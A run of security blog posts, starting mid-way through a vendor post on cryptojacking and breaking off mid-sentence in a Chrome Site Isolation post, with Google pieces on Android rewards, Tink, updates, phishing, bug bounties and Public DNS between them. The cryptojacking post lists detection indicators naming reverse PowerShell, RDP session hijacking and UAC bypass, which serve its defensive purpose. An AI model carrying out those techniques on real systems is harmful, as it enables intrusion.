damage to your business. Here’s a list of possible impact a cryptojacking attack can have: A slow-loading website: When an attacker exploits a website vulnerability by injecting a cryptomining tool like Coinhive, it can slow down page load time, driving away your visitors, users, or shoppers. Some attacks intentionally add a delay so that they can use more resources while the user waits for the page to load, as seen in the attack against Starbucks’ WiFi network in Buenos Aires cafes. High resource costs: If cryptominers persist in your infrastructure, you might unknowingly be footing a higher data center utility bill or cloud services provider bill. Think of it like this: If ransomware were grand theft auto, cryptojacking would be more akin to someone siphoning the gas from your tank little by little. You might not notice it right away, but your more frequent stops at the gas pump would eventually add up. That’s not all. Running CPU and GPU higher for a longer time can accelerate the wear and tear on your hardware, shortening its lifecycle and increasing your hardware costs. Data loss: No one wants to wake up to an egregious bill from your cloud services provider because an attacker spun up infinite resources overnight for cryptomining. While many security and IT teams have put in place auto-scaling limits to safeguard against this, some cryptojacking attacks are designed to start deleting existing cloud services when that limit is met. Security breach: Attackers are becoming increasingly efficient in their maldoings by packaging multiple attack modules and payloads into a single campaign. A malware campaign might drop a cryptominer packaged alongside a keylogger, backdoor, and other tools and techniques. If you detect cryptomining activities in your environment, don’t assume that the attackers’ intentions are single threaded. Opportunist attackers seeking financial gain will try to maximize their profits, whether by stealing your resources, your data, or both, if you let them. Explain How Cryptojacking Attacks Work Cryptojacking attacks take on multiple forms in the wild, often packaged with other modern attack modules found in various malware and ransomware attacks. Here are three common ways we see cryptojacking attacks unfold in the wild: Browser-based Cryptojacking Attacks In this common type of cryptojacking attack, an attacker injects a cryptominer into a compromised website, ad platform, or browser extension, often by exploiting cross-site scripting (XSS) vulnerabilities. This enables the cryptominer to use a device’s resources whenever the user browses the website, plays an ad, or installs the malicious browser extension. However, some attacks have been known to persist by launching a separate “pop under” window that hides behind the taskbar clock and continues to mine after the user exits the website. Because this type of cryptojacking attack doesn’t download or install any payload to the device, not every antivirus solution is able to protect against it. So, it’s important to ask your vendor specifically how it detects and blocks browser-based cryptomining activity. Using ad blockers, pop-up blockers, or even disabling JavaScript can add extra layers of cryptojacking protection. When it comes to your own website, know your vulnerabilities and patch, patch, patch. Vulnerabilities like Drupal CVE-2018-7600 and more recently, CVE-2018-7602 are common exploits for cryptojacking attacks. Cryptojacking the Public Cloud Public cloud environments provide near-infinite computing resources for an attacker bent on cryptomining. Once an attacker has infiltrated your public cloud environment, they can silently siphon your resources and perhaps delete or flood logs to cover their tracks. Or, more aggressively and with sufficient privileges, the attacker may spin up resources rapidly and programatically while deleting other user accounts in an attempt to lock you out of your account to disrupt the cryptojacking. Modern attacks against cloud infrastructure use bots to look for easy targets like unsecure servers or account credentials shared in Github. Practicing good cloud security hygiene across your organization is the best first defense to avoid becoming an easy target and an unfortunate headline. Here are a few good resources on cloud security best practices: 11 Simple Yet Important Tips to Secure AWS AlienVault Best Practices for AWS Security AWS Security Best Practices (Amazon) Introduction to Azure Security (Microsoft) Advanced Fileless Malware Attacks Fileless malware attacks are on the rise this year, and many of the campaigns we’ve observed in the wild include a cryptominer payload. Fileless attacks take advantage of PowerShell, Windows Management Instrumentation (WMI), and other common IT admin tools in order to evade detection by traditional antivirus and signature-based detection tools. For example, the AlienVault Labs Security Research Team recently analyzed MassMiner, noting that it uses PowerShell to download the cryptominer onto infected hosts. As I mentioned above, advanced fileless attacks are increasingly packaged with multiple tools, modules, and payloads into a single campaign. Detecting modern fileless attacks requires advanced threat hunting capabilities that go well beyond perimeter and endpoint protection tools. You must be able to identify new and evolving tools, tactics, and procedures (TTPs) that attackers employ for exploitation, installation, lateral movement, persistence, and exfiltration. Unless you have dedicated resources to research the latest TTPs found in the wild, hunt for threats, and analyze all the security data from across your environment, it can be a challenge to stay at pace with these types of emerging attacks. How AlienVault USM Anywhere Detects Cryptojacking As you can see, there’s no single way that a cryptojacking attack unfolds in the wild. These types of attacks evolve quickly and target critical infrastructure across cloud and on-premises environments. Fortunately, USM Anywhere delivers the capabilities needed to detect and respond quickly to the latest cryptojacking attacks. In order to detect and defend against cryptojacking attacks, it’s crucial to have visibility of your entire IT environment. USM Anywhere detects modern threats anywhere they appear across your public cloud infrastructure (AWS, Azure); SaaS / cloud apps (Office 365, Oka, G Suite); physical and virtualized on-premises; endpoints (Windows, Linux) on and off the network; even the dark web. To keep you at pace with the latest cryptojacking attacks without draining your security resources, USM Anywhere automates security monitoring and threat hunting activities. For example, to detect cryptojacking attacks against your AWS cloud infrastructure, USM Anywhere detects and correlates events like: AWS temporary security credentials with long duration New user starting a high number of instances New user account deleting multiple users Multiple instances being started or shut down programmatically CloudTrail trails deleted On endpoints and across your network, USM Anywhere detects and correlates indicators of a cryptojacking attack, including anomalous or suspicious behaviors by normal processes and services. Examples include: RDP (remote desktop protocol) Session Hijack using tscon.exe Reverse PowerShell use A SSH process created a tunnel between two hosts Suspicious command executed by a listening process (JBoss, ElasticSearch, Jenkins) Windows User Account Control (UAC) Bypass activity detected A Docker container recently launched is involved in cryptomining activities. Installation of Malicious Chrome Extension This list of TTPs is continuously and automatically updated in USM Anywhere through the threat intelligence service from the AlienVault Labs Security Research Team. This team uses machine learning capabilities, human intelligence, and the 20 million IOCs shared daily in the Open Threat Exchange (OTX) to identify emerging and evolving TTPs, which they curate and write into actionable correlation rules, endpoint queries, and more. As a result, you get alerts on real high-priority threats as well as response guidance and integrated incident response capabilities – all from a single cloud platform. There’s much more to discover about USM Anywhere. Start your free 14-day trial to test drive USM Anywhere and see for yourself the powerful threat detection and incident response capabilities built into the unified platform.       

table, th, td { border: 1px solid black; } td { width:100px; } Posted by Jason Woloz and Mayank Jain, Android Security & Privacy Team[Cross-posted from the Android Developers Blog]Our Android and Play security reward programs help us work with top researchers from around the world to improve Android ecosystem security every day. Thank you to all the amazing researchers who submitted vulnerability reports. Android Security RewardsIn the ASR program's third year, we received over 470 qualifying vulnerability reports from researchers and the average pay per researcher jumped by 23%. To date, the ASR program has rewarded researchers with over $3M, paying out roughly $1M per year. Here are some of the highlights from the Android Security Rewards program's third year: There were no payouts for our highest possible reward: a complete remote exploit chain leading to TrustZone or Verified Boot compromise. 99 individuals contributed one or more fixes. The ASR program's reward averages were $2,600 per reward and $12,500 per researcher. Guang Gong received our highest reward amount to date: $105,000 for his submission of a remote exploit chain. As part of our ongoing commitment to security we regularly update our programs and policies based on ecosystem feedback. We also updated our severity guidelines for evaluating the impact of reported security vulnerabilities against the Android platform. Google Play Security RewardsIn October 2017, we rolled out the Google Play Security Reward Program to encourage security research into popular Android apps available on Google Play. So far, researchers have reported over 30 vulnerabilities through the program, earning a combined bounty amount of over $100K. If undetected, these vulnerabilities could have potentially led to elevation of privilege, access to sensitive data and remote code execution on devices. Keeping devices secureIn addition to rewarding for vulnerabilities, we continue to work with the broad and diverse Android ecosystem to protect users from issues reported through our program. We collaborate with manufacturers to ensure that these issues are fixed on their devices through monthly security updates. Over 250 device models have a majority of their deployed devices running a security update from the last 90 days. This table shows the models with a majority of deployed devices running a security update from the last three months: ManufacturerDeviceANSL50AsusZenFone 5Z (ZS620KL/ZS621KL), ZenFone Max Plus M1 (ZB570TL), ZenFone 4 Pro (ZS551KL), ZenFone 5 (ZE620KL), ZenFone Max M1 (ZB555KL), ZenFone 4 (ZE554KL), ZenFone 4 Selfie Pro (ZD552KL), ZenFone 3 (ZE552KL), ZenFone 3 Zoom (ZE553KL), ZenFone 3 (ZE520KL), ZenFone 3 Deluxe (ZS570KL), ZenFone 4 Selfie (ZD553KL), ZenFone Live L1 (ZA550KL), ZenFone 5 Lite (ZC600KL), ZenFone 3s Max (ZC521TL)BlackBerryBlackBerry MOTION, BlackBerry KEY2BluGrand XL LTE, Vivo ONE, R2_3G, Grand_M2, BLU STUDIO J8 LTEbqAquaris V Plus, Aquaris V, Aquaris U2 Lite, Aquaris U2, Aquaris X, Aquaris X2, Aquaris X Pro, Aquaris U Plus, Aquaris X5 Plus, Aquaris U lite, Aquaris UDocomoF-04K, F-05J, F-03HEssential ProductsPH-1FujitsuF-01KGeneral MobileGM8, GM8 GoGooglePixel 2 XL, Pixel 2, Pixel XL, PixelHTCU12+, HTC U11+HuaweiHonor Note10, nova 3, nova 3i, Huawei Nova 3I, 荣耀9i, 华为G9青春版, Honor Play, G9青春版, P20 Pro, Honor V9, huawei nova 2, P20 lite, Honor 10, Honor 8 Pro, Honor 6X, Honor 9, nova 3e, P20, PORSCHE DESIGN HUAWEI Mate RS, FRD-L02, HUAWEI Y9 2018, Huawei Nova 2, Honor View 10, HUAWEI P20 Lite, Mate 9 Pro, Nexus 6P, HUAWEI Y5 2018, Honor V10, Mate 10 Pro, Mate 9, Honor 9, Lite, 荣耀9青春版, nova 2i, HUAWEI nova 2 Plus, P10 lite, nova 青春版本, FIG-LX1, HUAWEI G Elite Plus, HUAWEI Y7 2018, Honor 7S, HUAWEI P smart, P10, Honor 7C, 荣耀8青春版, HUAWEI Y7 Prime 2018, P10 Plus, 荣耀畅玩7X, HUAWEI Y6 2018, Mate 10 lite, Honor 7A, P9 Plus, 华为畅享8, honor 6x, HUAWEI P9 lite mini, HUAWEI GR5 2017, Mate 10ItelP13KyoceraX3LanixAlpha_950, Ilium X520LavaZ61, Z50LGELG Q7+, LG G7 ThinQ, LG Stylo 4, LG K30, V30+, LG V35 ThinQ, Stylo 2 V, LG K20 V, ZONE4, LG Q7, DM-01K, Nexus 5X, LG K9, LG K11MotorolaMoto Z Play Droid, moto g(6) plus, Moto Z Droid, Moto X (4), Moto G Plus (5th Gen), Moto Z (2) Force, Moto G (5S) Plus, Moto G (5) Plus, moto g(6) play, Moto G (5S), moto e5 play, moto e(5) play, moto e(5) cruise, Moto E4, Moto Z Play, Moto G (5th Gen)NokiaNokia 8, Nokia 7 plus, Nokia 6.1, Nokia 8 Sirocco, Nokia X6, Nokia 3.1OnePlusOnePlus 6, OnePlus5T, OnePlus3T, OnePlus5, OnePlus3OppoCPH1803, CPH1821, CPH1837, CPH1835, CPH1819, CPH1719, CPH1613, CPH1609, CPH1715, CPH1861, CPH1831, CPH1801, CPH1859, A83, R9s PlusPositivoTwist, Twist MiniSamsungGalaxy A8 Star, Galaxy J7 Star, Galaxy Jean, Galaxy On6, Galaxy Note9, Galaxy J3 V, Galaxy A9 Star, Galaxy J7 V, Galaxy S8 Active, Galaxy Wide3, Galaxy J3 Eclipse, Galaxy S9+, Galaxy S9, Galaxy A9 Star Lite, Galaxy J7 Refine, Galaxy J7 Max, Galaxy Wide2, Galaxy J7(2017), Galaxy S8+, Galaxy S8, Galaxy A3(2017), Galaxy Note8, Galaxy A8+(2018), Galaxy J3 Top, Galaxy J3 Emerge, Galaxy On Nxt, Galaxy J3 Achieve, Galaxy A5(2017), Galaxy J2(2016), Galaxy J7 Pop, Galaxy A6, Galaxy J7 Pro, Galaxy A6 Plus, Galaxy Grand Prime Pro, Galaxy J2 (2018), Galaxy S6 Active, Galaxy A8(2018), Galaxy J3 Pop, Galaxy J3 Mission, Galaxy S6 edge+, Galaxy Note Fan Edition, Galaxy J7 Prime, Galaxy A5(2016)Sharpシンプルスマホ４, AQUOS sense plus (SH-M07), AQUOS R2 SH-03K, X4, AQUOS R SH-03J, AQUOS R2 SHV42, X1, AQUOS sense lite (SH-M05)SonyXperia XZ2 Premium, Xperia XZ2 Compact, Xperia XA2, Xperia XA2 Ultra, Xperia XZ1 Compact, Xperia XZ2, Xperia XZ Premium, Xperia XZ1, Xperia L2, Xperia XTecnoF1, CAMON I AceVestelVestel Z20Vivovivo 1805, vivo 1803, V9 6GB, Y71, vivo 1802, vivo Y85A, vivo 1726, vivo 1723, V9, vivo 1808, vivo 1727, vivo 1724, vivo X9s Plus, Y55s, vivo 1725, Y66, vivo 1714, 1609, 1601VodafoneVodafone Smart N9XiaomiMi A2, Mi A2 Lite, MI 8, MI 8 SE, MIX 2S, Redmi 6Pro, Redmi Note 5 Pro, Redmi Note 5, Mi A1, Redmi S2, MI MAX 2, MI 6XZTEBLADE A6 MAXThank you to everyone internally and externally who helped make Android safer and stronger in the past year. Together, we made a huge investment in security research that helps Android users everywhere. If you want to get involved to make next year even better, check out our detailed program rules. For tips on how to submit complete reports, see Bug Hunter University.

Posted by Thai Duong, Information Security Engineer, on behalf of Tink teamAt Google, many product teams use cryptographic techniques to protect user data. In cryptography, subtle mistakes can have serious consequences, and understanding how to implement cryptography correctly requires digesting decades' worth of academic literature. Needless to say, many developers don’t have time for that.To help our developers ship secure cryptographic code we’ve developed Tink—a multi-language, cross-platform cryptographic library. We believe in open source and want Tink to become a community project—thus Tink has been available on GitHub since the early days of the project, and it has already attracted several external contributors. At Google, Tink is already being used to secure data of many products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, etc. After nearly two years of development, today we’re excited to announce Tink 1.2.0, the first version that supports cloud, Android, iOS, and more!Tink aims to provide cryptographic APIs that are secure, easy to use correctly, and hard(er) to misuse. Tink is built on top of existing libraries such as BoringSSL and Java Cryptography Architecture, but includes countermeasures to many weaknesses in these libraries, which were discovered by Project Wycheproof, another project from our team.With Tink, many common cryptographic operations such as data encryption, digital signatures, etc. can be done with only a few lines of code. Here is an example of encrypting and decrypting with our AEAD interface in Java: import com.google.crypto.tink.Aead;    import com.google.crypto.tink.KeysetHandle;    import com.google.crypto.tink.aead.AeadFactory;    import com.google.crypto.tink.aead.AeadKeyTemplates;    // 1. Generate the key material.    KeysetHandle keysetHandle = KeysetHandle.generateNew(        AeadKeyTemplates.AES256_EAX);    // 2. Get the primitive.    Aead aead = AeadFactory.getPrimitive(keysetHandle);    // 3. Use the primitive.    byte[] plaintext = ...;    byte[] additionalData = ...;    byte[] ciphertext = aead.encrypt(plaintext, additionalData);Tink aims to eliminate as many potential misuses as possible. For example, if the underlying encryption mode requires nonces and nonce reuse makes it insecure, then Tink does not allow the user to pass nonces. Interfaces have security guarantees that must be satisfied by each primitive implementing the interface. This may exclude some encryption modes. Rather than adding them to existing interfaces and weakening the guarantees of the interface, it is possible to add new interfaces and describe the security guarantees appropriately.We’re cryptographers and security engineers working to improve Google’s product security, so we built Tink to make our job easier. Tink shows the claimed security properties (e.g., safe against chosen-ciphertext attacks) right in the interfaces, allowing security auditors and automated tools to quickly discover usages where the security guarantees don’t match the security requirements. Tink also isolates APIs for potentially dangerous operations (e.g., loading cleartext keys from disk), which allows discovering, restricting, monitoring and logging their usage.Tink provides support for key management, including key rotation and phasing out deprecated ciphers. For example, if a cryptographic primitive is found to be broken, you can switch to a different primitive by rotating keys, without changing or recompiling code.Tink is also extensible by design: it is easy to add a custom cryptographic scheme or an in-house key management system so that it works seamlessly with other parts of Tink. No part of Tink is hard to replace or remove. All components are composable, and can be selected and assembled in various combinations. For example, if you need only digital signatures, you can exclude symmetric key encryption components to minimize code size in your application.To get started, please check out our HOW-TO for Java, C++ and Obj-C. If you'd like to talk to the developers or get notified about project updates, you may want to subscribe to our mailing list. To join, simply send an empty email to tink-users+subscribe@googlegroups.com. You can also post your questions to StackOverflow, just remember to tag them with tink.We’re excited to share this with the community, and welcome your feedback!

Posted by Dave Kleidermacher, VP, Head of Security - Android, Chrome OS, Play[Cross-posted from the Android Developers Blog]At Google I/O 2018, in our What's New in Android Security session, we shared a brief update on the Android security updates program. With the official release of Android 9 Pie, we wanted to share a more comprehensive update on the state of security updates, including best practice guidance for manufacturers, how we're making Android easier to update, and how we're ensuring compliance to Android security update releases. Commercial Best Practices around Android Security UpdatesAs we noted in our 2017 Android Security Year-in-Review, Android's anti-exploitation strength now leads the mobile industry and has made it exceedingly difficult and expensive to leverage operating system bugs into compromises. Nevertheless, an important defense-in-depth strategy is to ensure critical security updates are delivered in a timely manner. Monthly security updates are the recommended best practice for Android smartphones. We deliver monthly Android source code patches to smartphone manufacturers so they may incorporate those patches into firmware updates. We also deliver firmware updates over-the-air to Pixel devices on a reliable monthly cadence and offer the free use of Google's firmware over-the-air (FOTA) servers to manufacturers. Monthly security updates are also required for devices covered under the Android One program. While monthly security updates are best, at minimum, Android manufacturers should deliver regular security updates in advance of coordinated disclosure of high severity vulnerabilities, published in our Android bulletins. Since the common vulnerability disclosure window is 90 days, updates on a 90-day frequency represents a minimum security hygiene requirement. Enterprise Best PracticesProduct security factors into purchase decisions of enterprises, who often consider device security update cadence, flexibility of policy controls, and authentication features. Earlier this year, we introduced the Android Enterprise Recommended program to help businesses make these decisions. To be listed, Android devices must satisfy numerous requirements, including regular security updates: at least every 90 days, with monthly updates strongly recommended. In addition to businesses, consumers interested in understanding security update practices and commitment may also refer to the Enterprise Recommended list. Making Android Easier to UpdateWe've also been working to make Android easier to update, overall. A key pillar of that strategy is to improve modularity and clarity of interfaces, enabling operating system subsystems to be updated without adversely impacting others. Project Treble is one example of this strategy in action and has enabled devices to update to Android P more easily and efficiently than was possible in previous releases. The modularity strategy applies equally well for security updates, as a framework security update can be performed independently of device specific components. Another part of the strategy involves the extraction of operating system services into user-mode applications that can be updated independently, and sometimes more rapidly, than the base operating system. For example, Google Play services, including secure networking components, and the Chrome browser can be updated individually, just like other Google Play apps. Partner programs are a third key pillar of the updateability strategy. One example is the GMS Express program, in which Google is working closely with system-on-chip (SoC) suppliers to provide monthly pre-integrated and pre-tested Android security updates for SoC reference designs, reducing cost and time to market for delivering them to users. Security Patch Level ComplianceRecently, researchers reported a handful of missing security bug fixes across some Android devices. Initial reports had several inaccuracies, which have since been corrected. We have been developing security update testing systems that are now making compliance failures less likely to occur. In particular, we recently delivered a new testing infrastructure that enables manufacturers to develop and deploy automated tests across lower levels of the firmware stack that were previously relegated to manual testing. In addition, the Android build approval process now includes scanning of device images for specific patterns, reducing the risk of omission. Looking ForwardIn 2017, about a billion Android devices received security updates, representing approximately 30% growth over the preceding year. We continue to work hard devising thoughtful strategies to make Android easier to update by introducing improved processes and programs for the ecosystem. In addition, we are also working to drive increased and more expedient partner adoption of our security update and compliance requirements. As a result, over coming quarters, we expect the largest ever growth in the number of Android devices receiving regular security updates. Bugs are inevitable in all complex software systems, but exploitability of those bugs is not. We're working hard to ensure that the incidence of potentially harmful exploitation of bugs continues to decline, such that the frequency for security updates will reduce, not increase, over time. While monthly security updates represents today's best practice, we see a future in which security updates becomes easier and rarer, while maintaining the same goal to protect all users across all devices.

Posted by Shane Huntley, Threat Analysis GroupTLDR: Government-backed phishing has been in the news lately. If you receive a warning in Gmail, be sure to take prompt action. Get two-factor authentication on your account. And consider enrolling in the Advanced Protection Program.One of the main threats to all email users (whatever service you use) is phishing, attempts to trick you into providing a password that an attacker can use to sign into your account. Our ​improving ​technology has enabled ​us to ​significantly ​decrease ​the ​volume ​of ​phishing ​emails that ​get ​through to our users. ​ Automated ​protections, ​account ​security ​(like ​security ​keys), ​and specialized ​warnings give ​Gmail users industry-leading ​security.Beyond phishing for the purposes of fraud, a small minority of users in all corners of the world are still targeted by sophisticated government-backed attackers. These attempts come from dozens of countries. Since 2012, we've shown prominent warnings within Gmail notifying users that they may be targets of these types of phishing attempts; we show thousands of these warnings every month, even if we have blocked the specific attempt.We also send alerts to G Suite administrators if someone in their corporate network may have been the target of government-backed phishing. And we regularly post public advisories to make sure that people are aware of this risk.This is what an account warning looks like; an extremely small fraction of users will ever see one of these, but if you receive this warning from us, it's important to take immediate action on it.We intentionally send these notices in batches to all users who may be at risk, rather than at the moment we detect the threat itself, so that attackers cannot track some of our defense strategies. We have an expert team in our Threat Analysis Group, and we use a variety of technologies to detect these attempts. We also notify law enforcement about what we’re seeing; they have additional tools to investigate these attacks.We hope you never receive this type of warning, but if you do, please take action right away to enhance the security of your accounts.Even if you don’t receive such a warning, you should enable 2-step verification in Gmail. And if you think you’re at particular risk of government-backed phishing, consider enrolling in the Advanced Protection Program, which provides even stronger levels of security.

Posted by Eric Brown and Marc Henson, Trust & SafetySince 2010, Google’s Vulnerability Reward Programs have awarded more than $12 million dollars to researchers and created a thriving Google-focused security community. For the past two years, some of these rewards were for bug reports that were not strictly security vulnerabilities, but techniques that allow third parties to successfully bypass our abuse, fraud, and spam systems.Today, we are expanding our Vulnerability Reward Program to formally invite researchers to submit these reports.This expansion is intended to reward research that helps us mitigate potential abuse methods. A few examples of potentially valid reports for this program could include bypassing our account recovery systems at scale, identifying services vulnerable to brute force attacks, circumventing restrictions on content use and sharing, or purchasing items from Google without paying. Valid reports tend to result in changes to the product’s code, as opposed to removal of individual pieces of content.This program does not cover individual instances of abuse, such as the posting of content that violates our guidelines or policies, sending spam emails, or providing links to malware. These should continue to be reported through existing product-specific channels, such as for Google+, YouTube, Gmail, and Blogger.Reports submitted to our Vulnerability Reward Program that outline abuse methods are reviewed by experts on our Trust & Safety team, which specializes in the prevention and mitigation of abuse, fraud, and spam activity on our products.We greatly value our relationship with the research community, and we’re excited to expand on it to help make the internet a safer place for everyone. To learn more, see our updated rules.Happy hunting!

Posted by Alexander Dupuy, Software EngineerOnce upon a time, we launched Google Public DNS, which you might know by its iconic IP address, 8.8.8.8. (Sunday, August 12th, 2018, at 00:30 UTC marks eight years, eight months, eight days and eight hours since the announcement.) Though not as well-known as Google Search or Gmail, the four eights have had quite a journey—and some pretty amazing growth! Whether it’s travelers in India’s train stations or researchers on the remote Antarctic island Bouvetøya, hundreds of millions of people the world over rely on our free DNS service to turn domain names like wikipedia.org into IP addresses like 208.80.154.224.Google Public DNS query growth and major feature launchesToday, it’s estimated that about 10% of internet users rely on 8.8.8.8, and it serves well over a trillion queries per day. But while we’re really proud of that growth, what really matters is whether it’s a valuable service for our users. Namely, has Google Public DNS made the internet faster for users? Does it safeguard their privacy? And does it help them get to internet sites more reliably and securely?In other words, has 8.8.8.8 made DNS and the internet better as a whole? Here at Google, we think it has. On this numerological anniversary, let’s take a look at how Google Public DNS has realized those goals and what lies ahead.Making the internet fasterFrom the start, a key goal of Google Public DNS was to make the internet faster. When we began the project in 2007, Google had already made it faster to search the web, but it could take a while to get to your destination. Back then, most DNS lookups used your ISP’s resolvers, and with small caches, they often had to make multiple DNS queries before they could return an address.Google Public DNS resolvers’ DNS caches hold tens of billions of entries worldwide. And because hundreds of millions of clients use them every day, they usually return the address for your domain queries without extra lookups, connecting you to the internet that much faster.DNS resolution process for example.orgSpeeding up DNS responses is just one part of making the web faster—getting web content from servers closer to you can have an even bigger impact. Content Delivery Networks (CDNs) distribute large, delay-sensitive content like streaming videos to users around the world. CDNs use DNS to direct users to the nearest servers, and rely on GeoIP maps to determine the best location.Everything’s good if your DNS query comes from an ISP resolver that is close to you, but what happens if the resolver is far away, as it is for researchers on Bouvetøya? In that case, the CDN directs you to a server near the DNS resolver—but not the one closest to you. In 2010, along with other DNS and CDN services, we proposed a solution that lets DNS resolvers send part of your IP address in their DNS queries, so CDN name servers can get your best possible GeoIP location (short of sending your entire IP address). By sending only the first three parts of users’ IP addresses (e.g. 192.0.2.x) in the EDNS Client Subnet (ECS) extension, CDNs can return the closest content while maintaining user privacy.We continue to enhance ECS, (now published as RFC 7871), for example, by adding automatic detection of name server ECS support. And today, we’re happy to report, support for ECS is widespread among CDNs.Safeguarding user privacyFrom day one of our service, we’ve always been serious about user privacy. Like all Google services, we honor the general Google Privacy Policy, and are guided by Google’s Privacy Principles. In addition, Google Public DNS published a privacy practice statement about the information we collect and how it is used—and how it’s not used. These protect the privacy of your DNS queries once they arrive at Google, but they can still be seen (and potentially modified) en route to 8.8.8.8.To address this weakness, we launched a public beta of DNS-over-HTTPS on April 1, 2016, embedding your DNS queries in the secure and private HTTPS protocol. Despite the launch date, this was not an April Fool’s joke, and in the following two years, it has grown dramatically, with millions of users and support by another major public DNS service. Today, we are working in the IETF and with other DNS operators and clients on the Internet Draft for DNS Queries over HTTPS specification, which we also support.Securing the Domain Name SystemWe’ve always been very concerned with the integrity and security of the responses that Google Public DNS provides. From the start, we rejected the practice of hijacking nonexistent domain (NXDOMAIN) responses, working to provide users with accurate and honest DNS responses, even when attackers tried to corrupt them.In 2008, Dan Kaminsky publicized a major security weakness in the DNS protocol that left most DNS resolvers vulnerable to spoofing that poisoned their DNS caches. When we launched 8.8.8.8 the following year, we not only used industry best practices to mitigate this vulnerability, but also developed an extensive set of additional protections.While those protected our DNS service from most attackers, they can’t help in cases where an attacker can see our queries. Starting in 2010, the internet started to use DNSSEC security in earnest, making it possible to protect cryptographically signed domains against such man-in-the-middle and man-on-the-side attacks. In 2013, Google Public DNS became the first major public DNS resolver to implement DNSSEC validation for all its DNS queries, doubling the percentage of end users protected by DNSSEC from 3.3% to 8.1%.In addition to protecting the integrity of DNS responses, Google Public DNS also works to block DNS denial of service attacks by rate limiting both our queries to name servers and reflection or amplification attacks that try to flood victims’ network connections.Internet access for allA big part of Google Public DNS’s tremendous growth comes from free public internet services. We make the internet faster for hundreds of these services, from free WiFi in San Francisco’s parks to LinkNYC internet kiosk hotspots and the Railtel partnership in India‘s train stations. In places like Africa and Southeast Asia, many ISPs also use 8.8.8.8 to resolve their users’ DNS queries. Providing free DNS resolution to anyone in the world, even to other companies, supports internet access worldwide as a part of Google’s Next Billion Users initiative.APNIC Labs map of worldwide usage (Interactive Map)Looking aheadToday, Google Public DNS is the largest public DNS resolver. There are now about a dozen such services providing value-added features like content and malware filtering, and recent entrants Quad9 and Cloudflare also provide privacy for DNS queries over TLS or HTTPS.But recent incidents that used BGP hijacking to attack DNS are concerning. Increasing the adoption and use of DNSSEC is an effective way to protect against such attacks and as the largest DNSSEC validating resolver, we hope we can influence things in that direction. We are also exploring how to improve the security of the path from resolvers to authoritative name servers—issues not currently addressed by other DNS standards.In short, we continue to improve Google Public DNS both behind the scenes and in ways visible to users, adding features that users want from their DNS service. Stay tuned for some exciting Google Public DNS announcements in the near future!

Posted by Charlie Reis, Site IsolatorSpeculative execution side-channel attacks like Spectre are a newly discovered security risk for web browsers. A website could use such attacks to steal data or login information from other websites that are open in the browser. To better mitigate these attacks, we're excited to announce that Chrome 67 has enabled a security feature called Site Isolation on Windows, Mac, Linux, and Chrome OS. Site Isolation has been optionally available as an experimental enterprise policy since Chrome 63, but many known issues have been resolved since then, making it practical to enable by default for all desktop Chrome users.This launch is one phase of our overall Site Isolation project. Stay tuned for additional security updates that will mitigate attacks beyond Spectre (e.g., attacks from fully compromised renderer processes).What is Spectre?In January, Google Project Zero disclosed a set of speculative execution side-channel attacks that became publicly known as Spectre and Meltdown. An additional variant of Spectre was disclosed in May. These attacks use the speculative execution features of most CPUs to access parts of memory that should be off-limits to a piece of code, and then use timing attacks to discover the values stored in that memory. Effectively, this means that untrustworthy code may be able to read any memory in its process's address space.This is particularly relevant for web browsers, since browsers run potentially malicious JavaScript code from multiple websites, often in the same process. In theory, a website could use such an attack to steal information from other websites, violating the Same Origin Policy. All major browsers have already deployed some mitigations for Spectre, including reducing timer granularity and changing their JavaScript compilers to make the attacks less likely to succeed. However, we believe the most effective mitigation is offered by approaches like Site Isolation, which try to avoid having data worth stealing in the same process, even if a Spectre attack occurs.What is Site Isolation?Site Isolation is a large change to Chrome's architecture that limits each renderer process to documents from a single site. As a result, Chrome can rely on the operating system to prevent attacks between processes, and thus, between sites. Note that Chrome uses a specific definition of "site" that includes just the scheme and registered domain. Thus, https://google.co.uk would be a site, and subdomains like https://maps.google.co.uk would stay in the same process.Chrome has always had a multi-process architecture where different tabs could use different renderer processes. A given tab could even switch processes when navigating to a new site in some cases. However, it was still possible for an attacker's page to share a process with a victim's page. For example, cross-site iframes and cross-site pop-ups typically stayed in the same process as the page that created them. This would allow a successful Spectre attack to read data (e.g., cookies, passwords, etc.) belonging to other frames or pop-ups in its process.When Site Isolation is enabled, each renderer process contains documents from at most one site. This means all navigations to cross-site documents cause a tab to switch processes. It also means all cross-site iframes are put into a different process than their parent frame, using "out-of-process iframes." Splitting a single page across multiple processes is a major change to how Chrome works, and the Chrome Security team has been pursuing this for several years, independently of Spectre. The first uses of out-of-process iframes shipped last year to improve the Chrome extension security model.A single page may now be split across multiple renderer processes using out-of-process iframes.Even when each renderer process is limited to documents from a single site, there is still a risk that an attacker's page could access and leak information from cross-site URLs by requesting them as subresources, such as images or scripts. Web browsers generally allow pages to embed images and scripts from any site. However, a page could try to request an HTML or JSON URL with sensitive data as if it were an image or script. This would normally fail to render and not expose the data to the page, but that data would still end up inside the renderer process where a Spectre attack might access it. To mitigate this, Site Isolation includes a feature called Cross-Origin Read Blocking (CORB), which is now part of the Fetch spec. CORB tries to transparently block cross-site HTML, XML, and JSON responses from the renderer process, with almost no impact to compatibility. To get the most protection from Site Isolation and CORB, web developers should check that their resources are served with the right MIME type and with the nosniff response header.Site Isolation is a significant change to Chrome's behavior under the hood, but it generally shouldn't cause visible changes for most users or web developers (beyond a few known issues). It simply offers more protection between websites behind the scenes. Site Isolation does cause Chrome to create more renderer processes, which comes with performance tradeoffs: on the plus side, each renderer process is smaller, shorter-lived, and has less contention internally, but there is about a 10-13% total memory overhead in real workloads due to the larger number of processes. Our team continues to work hard to optimize this behavior to keep Chrome both fast and secure.How does Site Isolation help?In Chrome 67, Site Isolation has been enabled for 99% of users on Windows, Mac, Linux, and Chrome OS. (Given the large scope of this change, we are keeping a 1% holdback for now to monitor and improve performance.) This means that even if a Spectre attack were to occur in a malicious web page, data from other websites would generally not be loaded into the same process, and so there would be much less data available to the attacker. This significantly reduces the threat posed by Spectre.Because of this, we are planning to re-enable precise timers and features like SharedArrayBuffer (which can be used as a precise timer) for desktop.What additional work is in progress?We're now investigating how to extend Site Isolation coverage to Chrome for Android, where there are additional known issues. Experimental enterprise policies for enabling Site Isolation will be available in Chrome 68 for Android, and it can be enabled manually on Android using chrome://flags/#enable-site-per-process.We're also working on additional security checks in the browser process, which will let Site Isolation mitigate not just Spectre attacks but also attacks from fully compromised renderer processes. These additional enforcements will let us reach the original motivating goals for Site Isolation, where Chrome can effectively treat the entire renderer process as untrusted. Stay tuned for an update about these enforcements! Finally, other major browser vendors are finding related ways to defend against Spectre by better isolating sites. We are collaborating with them and are 